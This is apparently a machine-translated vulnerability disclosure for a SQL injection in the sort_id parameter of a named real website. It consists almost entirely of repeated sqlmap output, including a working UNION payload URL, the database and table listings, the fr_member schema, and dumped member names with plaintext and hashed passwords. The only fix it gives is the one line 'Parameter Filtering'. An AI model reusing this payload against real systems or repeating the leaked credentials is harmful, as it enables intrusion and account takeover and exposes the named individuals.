SQL Injection for another sub-station in langang
Injection point:
http://fr.linekong.com/xml/common.php?sort_id=*
The sort_id parameter has SQL injection.
Sqlmap identified the following injection points with a total of 2179 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92) -4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # Vector: union all select 92, [QUERY], 92,92 # --- web application technology: apacheback-end DBMS: MySQL >=5.0.0available databases [2]: [*] fr_web [*] information_schemasqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_web [28 tables] + Partitions + | partitions | fr_address | fr_article | fr_article_inserl | fr_build | fr_channel | fr_columns | fr_comment | fr_download | fr_flash | | fr_grading | fr_group | fr_image | fr_member | fr_passportstat | fr_sort | fr_template | fr_url | fr_vote | fr_vote_option | | fr_wj_article | fr_wj_image | fr_wj_image_inserl | + ------------------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_webTable: fr_member [26 columns] + ---------------- + -------------- + | Column | Type | + ------------------ + -------------- + | address_id | int (11) | article_id | int (11) | group_id | int (11) | id | int (11) | image_id | int (11) | nickname | varchar (64) | uadd_time | datetime | url_id | int (11) | user_age | date | user_Dreply | int (11) | user_Dtopic | int (11) | user_email | varchar (32) | user_grading | varchar (64) | user_jointime | datetime | user_like | varchar (255) | user_movephone | varchar (32) | user_msn | varchar (128) | user_name | varchar (32) | user_passwd | varchar (32) | user_perfect | int (11) | user_qq | int (11) | user_sex | int (2) | user_state | int (2) | user_Treply | int (11) | user_Ttopic | int (11) | vote_id | int (11) | + ---------------- + -------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: mySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_webTable: fr_member [8 entries] + ----------- + member + | user_name | user_passwd | + ----------- + member + | Dong Yong | jun | intern | student | Wang Lei | jun | Liu Zhigang | jun | | O & M engineer on duty | jun | Li Zhi | cd9dac6dbb33988a3214e7ba85d272fc | Zhang Jing | jun | Han qiuying | jun | + ----------- + ------------------------ +
Sqlmap identified the following injection points with a total of 2179 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92) -4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # Vector: union all select 92, [QUERY], 92,92 # --- web application technology: apacheback-end DBMS: MySQL >=5.0.0available databases [2]: [*] fr_web [*] information_schemasqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_web [28 tables] + Partitions + | partitions | fr_address | fr_article | fr_article_inserl | fr_build | fr_channel | fr_columns | fr_comment | fr_download | fr_flash | | fr_grading | fr_group | fr_image | fr_member | fr_passportstat | fr_sort | fr_template | fr_url | fr_vote | fr_vote_option | | fr_wj_article | fr_wj_image | fr_wj_image_inserl | + ------------------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: MySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_webTable: fr_member [26 columns] + ---------------- + -------------- + | Column | Type | + ------------------ + -------------- + | address_id | int (11) | article_id | int (11) | group_id | int (11) | id | int (11) | image_id | int (11) | nickname | varchar (64) | uadd_time | datetime | url_id | int (11) | user_age | date | user_Dreply | int (11) | user_Dtopic | int (11) | user_email | varchar (32) | user_grading | varchar (64) | user_jointime | datetime | user_like | varchar (255) | user_movephone | varchar (32) | user_msn | varchar (128) | user_name | varchar (32) | user_passwd | varchar (32) | user_perfect | int (11) | user_qq | int (11) | user_sex | int (2) | user_state | int (2) | user_Treply | int (11) | user_Ttopic | int (11) | vote_id | int (11) | + ---------------- + -------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: #1 * (URI) Type: UNION query Title: mySQL UNION query (92)-4 columns Payload: http://fr.linekong.com:80/xml/common.php?sort_id= 'Union all select 92, CONCAT (0x7178707871, 0x61676f74467957576955, 0x7170707671), 92,92 # --- web application technology: Apacheback-end DBMS: MySQL 5 Database: fr_webTable: fr_member [8 entries] + ----------- + member + | user_name | user_passwd | + ----------- + member + | Dong Yong | jun | intern | student | Wang Lei | jun | Liu Zhigang | jun | | O & M engineer on duty | jun | Li Zhi | cd9dac6dbb33988a3214e7ba85d272fc | Zhang Jing | jun | Han qiuying | jun | + ----------- + ------------------------ +
Solution:
Parameter Filtering